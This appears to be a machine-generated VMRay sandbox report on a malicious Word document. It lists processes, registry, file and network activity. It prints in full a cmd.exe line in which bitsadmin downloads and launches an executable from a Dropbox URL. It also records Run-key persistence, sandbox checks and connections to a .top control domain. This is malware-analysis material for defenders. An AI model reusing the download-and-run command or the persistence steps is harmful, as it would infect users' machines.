VMRay Analyzer Report for Sample #20911 VMRay Analyzer 2.2.0 Process 1 2388 winword.exe 1412 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\aETAdzjz\Desktop\ c:\program files\microsoft office\root\office16\winword.exe Child_Of Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 2 2640 cmd.exe 2388 cmd.exe cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe" C:\Users\aETAdzjz\Desktop\ c:\windows\system32\cmd.exe Child_Of Child_Of Child_Of Created Opened Opened Opened Opened Opened Opened Process 3 2668 waitfor.exe 2640 waitfor.exe waitfor /t 5 YKERQ C:\Users\aETAdzjz\Desktop\ c:\windows\system32\waitfor.exe Process 4 2704 bitsadmin.exe 2640 bitsadmin.exe bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe C:\Users\aETAdzjz\Desktop\ c:\windows\system32\bitsadmin.exe Child_Of Wrote_To Opened Opened Connected_To Connected_To Process 5 860 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Child_Of Child_Of Process 6 1628 iuoldw.exe 2640 iuoldw.exe C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\roaming\iuoldw.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Process 7 1960 roottools.exe 1628 roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" C:\Users\aETAdzjz\AppData\Roaming\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe Child_Of Child_Of Created Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Process 8 2032 cmd.exe 1628 cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat" C:\Users\aETAdzjz\Desktop\ c:\windows\syswow64\cmd.exe Created Read_From Wrote_To Opened Deleted Opened Opened Opened Process 9 2384 wmiadap.exe 860 wmiadap.exe wmiadap.exe /F /T /R C:\Windows\system32\ c:\windows\system32\wbem\wmiadap.exe Process 10 712 svchost.exe 476 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted C:\Windows\system32\ c:\windows\system32\svchost.exe Process 11 2584 wmiprvse.exe 600 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 12 1588 svchost.exe 1960 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Child_Of Created Created Created Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Process 13 1532 svchost.exe 1960 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Process 14 1016 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 15 1700 roottools.exe 1392 roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe Child_Of Child_Of Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Process 16 800 svchost.exe 1700 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\syswow64\svchost.exe Child_Of Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Process 17 2040 svchost.exe 1700 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\syswow64\svchost.exe Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Process 18 1000 svchost.exe 472 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 19 856 svchost.exe 472 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Child_Of Child_Of Child_Of Child_Of Process 20 1428 upde25b4796.exe 800 upde25b4796.exe "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Created Opened Opened Opened Created Created Opened Opened Opened Opened Process 21 1404 wmiprvse.exe 596 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 22 2024 roottools.exe 1428 roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" C:\Users\aETAdzjz\AppData\Roaming\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe Child_Of Child_Of Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Process 23 1700 cmd.exe 1428 cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat" C:\Windows\system32\ c:\windows\syswow64\cmd.exe Created Read_From Wrote_To Opened Deleted Opened Opened Opened Process 24 1592 svchost.exe 2024 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Process 25 2016 svchost.exe 2024 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Created Created Created Created Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 26 1600 wmiprvse.exe 596 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 27 708 svchost.exe 472 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted C:\Windows\system32\ c:\windows\system32\svchost.exe Process 28 1404 wmiadap.exe 856 wmiadap.exe wmiadap.exe /F /T /R C:\Windows\system32\ c:\windows\system32\wbem\wmiadap.exe Process 29 1552 wmiprvse.exe 596 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe WinRegistryKey Licenses HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 HKEY_CLASSES_ROOT WinRegistryKey win64 INVALID WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 HKEY_CLASSES_ROOT WinRegistryKey Software\Microsoft\VBA\7.1\Common HKEY_CURRENT_USER RequireDeclaration CompileOnDemand NotifyUserBeforeStateLoss BackGroundCompile BreakOnAllErrors BreakOnServerErrors WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE File STD_INPUT_HANDLE SocketAddress www.dropbox.com 443 NetworkConnection HTTP www.dropbox.com 443 URI https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 Contains URI www.dropbox.com File Users\aETAdzjz\AppData\Roaming\iuoldw.exe Users\aETAdzjz\AppData\Roaming\iuoldw.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe exe File popupkiller.exe popupkiller.exe c:\ c:\popupkiller.exe exe File stimulator.exe stimulator.exe c:\ c:\stimulator.exe exe File tools\execute.exe tools\execute.exe c:\ c:\tools\execute.exe exe File npf_ndiswanip File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig rig MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\iuoldw.exe users\aetadzjz\appdata\roaming\iuoldw.exe c:\ c:\users\aetadzjz\appdata\roaming\iuoldw.exe exe File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming users\aetadzjz\appdata\roaming c:\ c:\users\aetadzjz\appdata\roaming File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys com\support\flashplayer\sys File users\aetadzjz\appdata\local\temp\updaa5900b0.bat users\aetadzjz\appdata\local\temp\updaa5900b0.bat c:\ c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat bat MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex Mutex 9B4D68961731FE3C22DA08B640799EB6 Mutex Sandboxie_SingleInstanceMutex_Control Mutex Frz_State Mutex E58EFF540968A436E982FCFA1C0445A2 WinRegistryKey SOFTWARE\Microsoft\VBA\Monitors HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallDate InstallDate InstallDate InstallDate InstallDate WinRegistryKey Software\WINE HKEY_CURRENT_USER WinRegistryKey Software\WINE HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallDate WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE DigitalProductId DigitalProductId DigitalProductId DigitalProductId DigitalProductId WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE DigitalProductId WinRegistryKey SOFTWARE\Microsoft HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\GDIPlus HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\MSDAIPP HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\IAM HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\OneDrive HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Direct3D HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Shared HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\IMEJP HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Speech HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Exchange HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Wisp HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Notepad HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\SQMClient HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Keyboard HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\wfs HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\SkyDrive HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Feeds HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Fax HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\FTP HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Kaev HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Lukuip HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Boteun HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex C2E6ECE9938A43206F172A85684E36DB Mutex CEE48AFA231AB21CA6E2437DB844BAD7 Mutex 1F4C22565107A34AD73CB0F585F8F77C Mutex 9B4D68961731FE3C22DA08B640799EB6 Mutex 20BC29E135FB9B01285187E3B5593CC8 WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna File users\aetadzjz\appdata\local\temp\updaa5900b0.bat users\aetadzjz\appdata\local\temp\updaa5900b0.bat c:\ c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat bat File STD_INPUT_HANDLE File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File users\aetadzjz\appdata\roaming\iuoldw.exe users\aetadzjz\appdata\roaming\iuoldw.exe c:\ c:\users\aetadzjz\appdata\roaming\iuoldw.exe exe WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig rig Mutex E58EFF540968A436E982FCFA1C0445A2 Mutex B3F6E53F120A5BE5825B9C06159BB3F4 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE WinRegistryKey Software\Microsoft\Windows\Currentversion\Run HKEY_CURRENT_USER roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl SocketAddress aaopsjdf.top 443 NetworkConnection HTTP aaopsjdf.top 443 URI aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw Contains URI None URI aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw Contains File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv Mutex 20BC29E135FB9B01285187E3B5593CC8 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex B3F6E53F120A5BE5825B9C06159BB3F4 WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe 